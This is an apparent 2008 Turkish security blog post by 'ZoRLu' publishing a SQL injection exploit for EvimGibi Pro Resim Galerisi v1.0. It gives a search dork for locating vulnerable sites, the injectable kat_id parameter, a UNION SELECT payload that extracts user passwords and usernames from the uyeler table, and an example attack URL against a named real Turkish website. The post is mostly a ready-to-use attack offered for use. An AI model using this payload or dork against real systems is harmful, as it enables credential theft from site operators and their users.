EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

17 Aralık 2008 Çarşamba

EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

yayınlanma tarihine ve gönderilme tarihine dikkat edin ilk milw0rm.com a gönderdim :D


EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

link: http://www.exploiter5.com/all.php?id=39

link: http://packetstormsecurity.org/0812-exploits/evimgibi-sql.txt

author: ZoRLu

dork: intext:"Asp Programlama : EvimGibi"

exploit:

http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]

[SQL]=

-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler

example:

http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler

ZoRLu | ZRL | Buffer Overflow

17 Aralık 2008 Çarşamba

EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com